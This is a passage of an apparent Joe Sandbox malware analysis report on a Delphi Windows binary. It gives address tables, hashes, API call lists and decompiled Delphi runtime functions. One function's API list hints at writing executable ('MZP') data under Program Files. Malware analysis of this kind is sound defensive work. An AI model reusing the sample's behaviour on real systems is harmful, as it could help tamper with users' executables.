                                                                          0x004063d1
                                                                          0x004063d3
                                                                          0x004063d3
                                                                          0x004063e4
                                                                          0x004063e9
                                                                          0x004063ec
                                                                          0x004063ee
                                                                          0x004063f0
                                                                          0x004063f0
                                                                          0x004063f2
                                                                          0x004063f4
                                                                          0x004063f6
                                                                          0x004063f7
                                                                          0x004063fe
                                                                          0x00406405
                                                                          0x00406406
                                                                          0x00406407
                                                                          0x00406408
                                                                          0x0040640a
                                                                          0x0040640b
                                                                          0x0040640f
                                                                          0x00406414
                                                                          0x00406417
                                                                          0x0040641d
                                                                          0x00406423
                                                                          0x00406427
                                                                          0x0040642c
                                                                          0x00406435
                                                                          0x00406435
                                                                          0x0040643c
                                                                          0x00406441
                                                                          0x00406444
                                                                          0x00406447
                                                                          0x0040644a
                                                                          0x0040644d
                                                                          0x0040644f
                                                                          0x00406453
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00000000
                                                                          0x004062e7
                                                                          0x004062e7
                                                                          0x004062e9
                                                                          0x004062ee
                                                                          0x004062ef
                                                                          0x004062f2
                                                                          0x004062f5
                                                                          0x004062f6
                                                                          0x004062fb
                                                                          0x004062fe
                                                                          0x00406303
                                                                          0x00406304
                                                                          0x0040630c
                                                                          0x0040630d
                                                                          0x00406310
                                                                          0x00406313
                                                                          0x00406320
                                                                          0x00406325
                                                                          0x0040632e
                                                                          0x00406333
                                                                          0x0040633e
                                                                          0x00406344
                                                                          0x0040635b
                                                                          0x00406378
                                                                          0x0040637d
                                                                          0x00406458
                                                                          0x0040645b
                                                                          0x0040645d
                                                                          0x00406463
                                                                          0x00406465
                                                                          0x0040646a
                                                                          0x00000000
                                                                          0x0040646a
                                                                          0x004062e1
                                                                          0x0040646b
                                                                          0x00406264
                                                                          0x00406264
                                                                          0x00406264
                                                                          0x00406222
                                                                          0x00406224
                                                                          0x00406225
                                                                          0x0040622a
                                                                          0x0040622d
                                                                          0x00000000
                                                                          0x0040622f
                                                                          0x00406231
                                                                          0x00406233
                                                                          0x0040623c
                                                                          0x0040623f
                                                                          0x00406242
                                                                          0x00406244
                                                                          0x00406244
                                                                          0x00406244
                                                                          0x00406248
                                                                          0x00406254
                                                                          0x00406259
                                                                          0x0040625a
                                                                          0x0040625c
                                                                          0x00000000
                                                                          0x00406235
                                                                          0x00406236
                                                                          0x0040647f
                                                                          0x00406481
                                                                          0x00406484
                                                                          0x00000000
                                                                          0x00406484
                                                                          0x00406489
                                                                          0x00406489
                                                                          0x00406233
                                                                          0x0040622d

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                          • Instruction ID: ab27ac02cf2ee968932468d3d4c2958694adf508222a5702edd9c4bd71c6629c
                                                                          • Opcode Fuzzy Hash: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                          • Instruction Fuzzy Hash: A73184B12002006FDB04BF658C85F2A3A69AFD4314F5244BEBA06BF2D7D639DCA1975C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040FCB0, Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                          • Instruction ID: 4cf276d7622785da586c8009362eb5643f0905aac9be693976ada0e9182b1a0c
                                                                          • Opcode Fuzzy Hash: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                          • Instruction Fuzzy Hash: 7E3102706041006FDB24AF65CC82F2A3A6AAF84308F5144BFB901BF6DBC63DDC499758
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004100D0, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 409COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410198
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004101B7
                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00410221
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410356
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 0041040F
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 00410496
                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004101EA
                                                                            • Part of subcall function 0040FC78: GetObjectA.GDI32(00000000,00000018), ref: 0040FC8A
                                                                            • Part of subcall function 0040FBEC: 72E7AC50.USER32(00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC0F
                                                                            • Part of subcall function 0040FBEC: 72E7A7A0.GDI32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC2A
                                                                            • Part of subcall function 0040FBEC: 72E7B380.USER32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 0040FC35
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 0041052B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$CopyImage$B380
                                                                          • String ID: (
                                                                          • API String ID: 1117845954-3887548279
                                                                          • Opcode ID: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                          • Instruction ID: a4bd64b3fd63d48472c9145484328d1e8b73c1e654bc960fa13628ff834bc38b
                                                                          • Opcode Fuzzy Hash: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                          • Instruction Fuzzy Hash: 05E15134E002189BDB20EBA9C885BDEB7B5AF48314F50807BF505F7382DA799D85CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00410C68, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,Function_0000748C), ref: 00410DB0
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410DC2
                                                                            • Part of subcall function 0040E600: CreateFileA.KERNEL32(?,40000400,40000400,00000000,40000400,40000400,00000000,0040E6CC,00000000,Function_00004C66), ref: 0040E620
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410EF9
                                                                            • Part of subcall function 0040E65C: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,0040E75F,00000000,Function_00004CE6), ref: 0040E667
                                                                            • Part of subcall function 0040E64C: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00410C11,00000000,Function_000071BF), ref: 0040E654
                                                                            • Part of subcall function 0040E678: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040E682
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                          • API String ID: 997383822-4093836345
                                                                          • Opcode ID: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                          • Instruction ID: 2f0480c31d9fc6f6f6bd4ff7e20304d554dec23e4d9677c87e7e87a18c1bd8bd
                                                                          • Opcode Fuzzy Hash: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                          • Instruction Fuzzy Hash: B1515570B003089BDB14FB6ECC8269EB3659F55308F5089BBB404B73D2DA7D9E854B59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403D7D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00403D7D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x40a5a4)) =  *((intOrPtr*)(__eax - 0x40a5a4)) + __eax - 0x40a5a4;
				 *0x40900c = 2;
				 *0x40a010 = 0x401008;
				 *0x40a014 = 0x401010;
				 *0x40a036 = 2;
				 *0x40a000 = E00403960;
				if(E00402808() != 0) {
					_t3 = E00402838();
				}
				E004028FC(_t3);
				 *0x40a03c = 0xd7b0;
				 *0x40a208 = 0xd7b0;
				 *0x40a3d4 = 0xd7b0;
				 *0x40a02c = GetCommandLineA();
				 *0x40a028 = E00401098();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x40a5a8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x40a020 = _t11;
				return _t11;
			}





                                                                          0x00403d7d
                                                                          0x00403d82
                                                                          0x00403d87
                                                                          0x00403d89
                                                                          0x00403d90
                                                                          0x00403d9a
                                                                          0x00403da4
                                                                          0x00403dab
                                                                          0x00403dbc
                                                                          0x00403dbe
                                                                          0x00403dbe
                                                                          0x00403dc3
                                                                          0x00403dc8
                                                                          0x00403dd1
                                                                          0x00403dda
                                                                          0x00403de8
                                                                          0x00403df2
                                                                          0x00403e06
                                                                          0x00403e3f
                                                                          0x00403e08
                                                                          0x00403e16
                                                                          0x00403e2e
                                                                          0x00403e18
                                                                          0x00403e18
                                                                          0x00403e18
                                                                          0x00403e16
                                                                          0x00403e44
                                                                          0x00403e49
                                                                          0x00403e4e

                                                                          APIs
                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32(00000000), ref: 0040280D
                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32(00000001), ref: 00402819
                                                                          • GetCommandLineA.KERNEL32 ref: 00403DE3
                                                                          • GetVersion.KERNEL32 ref: 00403DF7
                                                                          • GetVersion.KERNEL32 ref: 00403E08
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00403E44
                                                                            • Part of subcall function 00402838: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                            • Part of subcall function 00402838: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                            • Part of subcall function 00402838: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                          • GetThreadLocale.KERNEL32 ref: 00403E24
                                                                            • Part of subcall function 00403CB4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                          • String ID: p8b
                                                                          • API String ID: 3734044017-529731021
                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction ID: 4e42c8c4ff7c9e6347351f52ed3844a5f6dcad7449c2d11acc3bcf8107044070
                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction Fuzzy Hash: 7B016DB180438599E710BF72AA4A3193E64AB11309F10853FA080BA3F3D77D06989B6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040C9B0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E,0040BF7B), ref: 0040C9E9
                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E), ref: 0040C9EF
                                                                          • GetStdHandle.KERNEL32(000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA04
                                                                          • WriteFile.KERNEL32(00000000,000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA0A
                                                                          • MessageBoxA.USER32 ref: 0040CA28
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileHandleWrite$Message
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1570097196-2970929446
                                                                          • Opcode ID: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                          • Instruction ID: e346e235dea6380484e37d32cf1e26acb754014f59db45d581b47c6c48365cc5
                                                                          • Opcode Fuzzy Hash: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                          • Instruction Fuzzy Hash: 58F0CDA0BC430878E620E3A4AE0AF5A221C4348B15F60463FB220741D3C6BC4894C72F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402F18, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 79%
                                                                          			E00402F18(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x40a034 == 0) {
					if( *0x409024 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x40a208 == 0xd7b2 &&  *0x40a210 > 0) {
						 *0x40a220();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00402FA0, 2,  &_v4, 0);
				}
			}





                                                                          0x00402f20
                                                                          0x00402f80
                                                                          0x00402f90
                                                                          0x00402f90
                                                                          0x00402f96
                                                                          0x00402f22
                                                                          0x00402f2b
                                                                          0x00402f3b
                                                                          0x00402f3b
                                                                          0x00402f57
                                                                          0x00402f78
                                                                          0x00402f78

                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000), ref: 00402F51
                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000), ref: 00402F57
                                                                          • GetStdHandle.KERNEL32(000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F6C
                                                                          • WriteFile.KERNEL32(00000000,000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F72
                                                                          • MessageBoxA.USER32 ref: 00402F90
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileHandleWrite$Message
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1570097196-2970929446
                                                                          • Opcode ID: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                          • Instruction ID: 6c3b7e42d3c7ef80f9ab9078d96d43441ff44d86987642024caec186a117226f
                                                                          • Opcode Fuzzy Hash: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                          • Instruction Fuzzy Hash: 5AF0B47168438538E630A3609F0EF5A226C4744B99F20467FB660781F6C7FC58C4921E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040184C, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 71%
                                                                          			E0040184C() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x40a5ac == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401922);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x40a035 != 0) {
						_push(0x40a5b4);
						L004010E4();
					}
					 *0x40a5ac = 0;
					_t3 =  *0x40a60c; // 0x640868
					LocalFree(_t3);
					 *0x40a60c = 0;
					_t19 =  *0x40a5d4; // 0x641e7c
					while(_t19 != 0x40a5d4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E0040114C(0x40a5d4);
					E0040114C(0x40a5e4);
					E0040114C(0x40a610);
					_t14 =  *0x40a5cc; // 0x641868
					while(_t14 != 0) {
						 *0x40a5cc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x40a5cc; // 0x641868
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401929);
					if( *0x40a035 != 0) {
						_push(0x40a5b4);
						L004010EC();
					}
					_push(0x40a5b4);
					L004010F4();
					return 0;
				}
			}










                                                                          0x0040184d
                                                                          0x00401857
                                                                          0x0040192b
                                                                          0x0040185d
                                                                          0x0040185f
                                                                          0x00401860
                                                                          0x00401865
                                                                          0x00401868
                                                                          0x00401872
                                                                          0x00401874
                                                                          0x00401879
                                                                          0x00401879
                                                                          0x0040187e
                                                                          0x00401885
                                                                          0x0040188b
                                                                          0x00401892
                                                                          0x00401897
                                                                          0x004018b1
                                                                          0x004018aa
                                                                          0x004018af
                                                                          0x004018af
                                                                          0x004018be
                                                                          0x004018c8
                                                                          0x004018d2
                                                                          0x004018d7
                                                                          0x004018de
                                                                          0x004018e2
                                                                          0x004018e9
                                                                          0x004018ee
                                                                          0x004018f3
                                                                          0x004018f9
                                                                          0x004018fc
                                                                          0x004018ff
                                                                          0x0040190b
                                                                          0x0040190d
                                                                          0x00401912
                                                                          0x00401912
                                                                          0x00401917
                                                                          0x0040191c
                                                                          0x00401921
                                                                          0x00401921

                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 00401879
                                                                          • LocalFree.KERNEL32(00640868,00000000,00401922), ref: 0040188B
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00640868,00000000,00401922), ref: 004018AA
                                                                          • LocalFree.KERNEL32(00641868,?,00000000,00008000,00640868,00000000,00401922), ref: 004018E9
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00640868,00000000,00401922), ref: 00401912
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00640868,00000000,00401922), ref: 0040191C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID:
                                                                          • API String ID: 3782394904-0
                                                                          • Opcode ID: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                          • Instruction ID: 2c75820c4bf2e6ed0dab6d922aeac6927b5e2e4dc662dc8188128fe539cf0cf0
                                                                          • Opcode Fuzzy Hash: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                          • Instruction Fuzzy Hash: FD1182B1704380AEE715EBA69D92B1277E8B745708F14847BF140B66F2C67D9860CB1E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B2E4, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 0040B311
                                                                          • LocalFree.KERNEL32(00640868,00000000,00401922), ref: 0040B323
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00640868,00000000,00401922), ref: 0040B342
                                                                          • LocalFree.KERNEL32(00641868,?,00000000,00008000,00640868,00000000,00401922), ref: 0040B381
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00640868,00000000,00401922), ref: 0040B3AA
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00640868,00000000,00401922), ref: 0040B3B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID:
                                                                          • API String ID: 3782394904-0
                                                                          • Opcode ID: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                          • Instruction ID: 308c92a7e2b5e7ecfd07cead530b628894948fc1d130f20f37bfe88cfaf8842a
                                                                          • Opcode Fuzzy Hash: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                          • Instruction Fuzzy Hash: 89115EB06043406ED711EB669D41B167BB9F745708F24843BE944B62E2C77DA870CB6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402838, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 65%
                                                                          			E00402838() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x409018 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x409018; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x409018 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E004028A9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4028b0);
					return RegCloseKey(_v8);
				}
			}












                                                                          0x00402839
                                                                          0x0040283b
                                                                          0x00402845
                                                                          0x00402861
                                                                          0x004028b0
                                                                          0x004028c2
                                                                          0x004028c5
                                                                          0x004028ce
                                                                          0x00402863
                                                                          0x00402865
                                                                          0x00402866
                                                                          0x0040286b
                                                                          0x0040286e
                                                                          0x00402871
                                                                          0x0040288d
                                                                          0x00402894
                                                                          0x00402897
                                                                          0x0040289a
                                                                          0x004028a8
                                                                          0x004028a8

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                          • API String ID: 3677997916-4173385793
                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction ID: a813fbf5fdd61ad2e6297c1d03dc0b5dcb1e266bf9714427259c3b0395662638
                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction Fuzzy Hash: 9D018D7A940308B9EB11EF90CD46FEA77ACDB04700F104177B904F65D0E6785A54D79C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040C2D0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
